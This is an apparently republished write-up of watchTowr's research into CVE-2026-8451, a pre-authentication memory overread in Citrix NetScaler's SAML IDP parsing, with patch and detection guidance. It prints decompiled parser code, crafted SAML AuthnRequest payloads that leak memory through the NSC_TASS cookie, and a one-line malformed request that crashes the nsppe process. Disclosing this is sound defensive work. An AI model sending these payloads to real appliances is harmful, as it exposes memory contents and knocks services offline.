CitrixBleed Infinity: Pre‑Auth Memory Overread in NetScaler (CVE‑2026‑8451)
The watchTowr team uncovered a high‑severity (CVSS 8.8) pre‑authentication memory overread vulnerability (CVE‑2026‑8451) in Citrix NetScaler’s SAML IDP parsing, detailing the XML attribute flaw, exploitation steps, leaked data, a simple DoS path, detection tooling, and remediation guidance.
Vulnerability Overview
Security researchers from watchTowr disclosed a new pre‑authentication memory overread vulnerability in Citrix NetScaler, assigned CVE‑2026‑8451 with a CVSS score of 8.8. The flaw belongs to the CitrixBleed family and affects SAML IDP configurations where XML attribute parsing lacks proper validation, allowing unauthenticated attackers to read sensitive memory.
CVE ID: CVE‑2026‑8451
Name: Citrix Bleed To Infinity And Beyond
Type: Pre‑Auth Memory Overread
CVSS: 8.8 (High)
Root Cause: Insufficient input validation in SAML AuthnRequest XML attribute parsing
Trigger: NetScaler configured as a SAML IDP
Technical Analysis
XML Attribute Parser Defect
During review of the CVE‑2026‑3055 patch, the team found the following problematic logic in the SAML AuthnRequest parser:
cursor = <input string>;
// skip leading whitespace
for (lookahead = ...; ; lookahead++) {
ch = *cursor;
if (ch > '=') break;
if (!_bittest64(&whitespaceCharList, ch)) {
if (ch == '=') {
// found '=', skip following whitespace
while (1) {
ch = *lookahead;
if (ch > 0x20 || !_bittest64(&whitespaceCharList, ch)) break;
++lookahead;
}
cursor = lookahead;
}
break;
}
++cursor;
}
// Determine how the attribute value is quoted
if (ch == '\'' || ch == '"') {
terminator = ch;
first = *++cursor;
} else {
terminator = ' ';
first = ch;
}
// Scan until terminator
while (first != '\0' && first != '>') {
scanPos++;
first = *scanPos;
if (first == terminator) break;
}The code lacks explicit boundary checks, treats quoted and unquoted values differently, and mishandles the '>' character as a terminator only in the attribute‑name phase, leading to uncontrolled reads.
From Faulty Parsing to Overread
Normal parsing of a SAML AuthnRequest succeeds, but when the team replaced spaces after attribute values with newline characters, the parser continued reading past the request buffer until it encountered a '>' character.
AuthnReq start tag parsed, id=<_99d3e71118f42305e05acb14ad0bd917>, acs=<http://sp.example.com/demo1/index.php?acs>, forceAuth=<0>, binding=<POST>, following data "ProtocolBinding=..."After injecting newlines, the log shows:
AuthnReq start tag parsed, id=<22>, acs=<11 id=22>, forceAuth=<0>, binding=<Unknown>, following data Version="2.0" AssertionConsumerServiceURL=11 id=22> <saml:Issuer>watchtowr...The parser failed to stop at the newline and read beyond the buffer.
Further Overread
By crafting a payload with a newline after the AssertionConsumerServiceURL attribute, the parser read memory beyond the request buffer, mixing arbitrary bytes into the parsed output.
<samlp:AuthnRequest Version="2.0" AssertionConsumerServiceURL=>
<saml2:issuer>watchtowr</saml2:issuer>
</samlp:AuthnRequest>
Version="2.0"
id="11" AuthnReq start tag parsed, id=<>, acs=<▒^M▒ᆳ▒="2.0" id="11"
AssertionConsumerServiceURL="22"ᆳ▒mple.com/demo1/index.php</saml:Issuer>,
forceAuth=<0>, binding=<Unknown>The parser had read past the request buffer and injected those bytes into the result.
Exploitation
Attack Path
Exploiting the bug requires sending a specially crafted SAML AuthnRequest that forces the XML parser to scan beyond the request buffer. NetScaler returns the parsed ID and AssertionConsumerServiceURL values in the NSC_TASS cookie, leaking the over‑read memory to the client.
Leaked bytes include patterns such as 0xdeadbeef and a plausible process pointer 0xa10ca7ed, indicating the vulnerability can serve as an information‑leak primitive that, when combined with a memory‑corruption bug, could lead to full device compromise.
Leaked bytes:
00000000 f0 0d 90 de de de de de de de de de de de de de |................|
00000010 de de de de de de de de de de de de de de de de |................|
00000020 de de de de de de de de de de de de de de de de |................|
00000030 de de de de de de de de de de de de de de de de |................|
00000040 de de de de de de de de de de de ed a7 |................|
00000050 0c a1 35 00 |..5.|Simple Denial‑of‑Service
Sending a malformed request (e.g., an incomplete <samlp:AuthnRequest ID= tag) can crash the nsppe process, providing a quick way to demonstrate impact without building a full exploit chain.
<samlp:AuthnRequest ID=Detection Tool
The researchers released an open‑source detection script:
GitHub: https://github.com/watchtowrlabs/watchTowr-vs-Netscaler-CVE-2026-8451
Remediation Recommendations
Immediate Update: Upgrade NetScaler ADC/Gateway to patched versions:
14.1 → 14.1‑72.61 or later
13.1 → 13.1‑63.18 or later
FIPS versions → apply the corresponding official patches
Temporary Mitigations: If updating is not possible, consider:
Disabling SAML IDP configuration when not required
Monitoring traffic to the /saml/login endpoint
Inspecting the NSC_TASS cookie for anomalous data
Timeline
2026‑03‑28: watchTowr discovers the vulnerability and notifies Citrix and affected customers.
2026‑03‑30: Citrix auto‑replies.
2026‑04‑30: watchTowr requests a fix.
2026‑05‑07: Citrix indicates a fix is in development.
2026‑06‑14: Citrix plans a public announcement for 2026‑06‑29.
2026‑06‑30: Citrix publishes the advisory and patches.
2026‑07‑07: watchTowr publicly releases detailed research.
Signed-in readers can open the original source through BestHub's protected redirect.
This article has been distilled and summarized from source material, then republished for learning and reference. If you believe it infringes your rights, please contactand we will review it promptly.
Black & White Path
We are the beacon of the cyber world, a stepping stone on the road to security.
How this landed with the community
Was this worth your time?
0 Comments
Thoughtful readers leave field notes, pushback, and hard-won operational detail here.
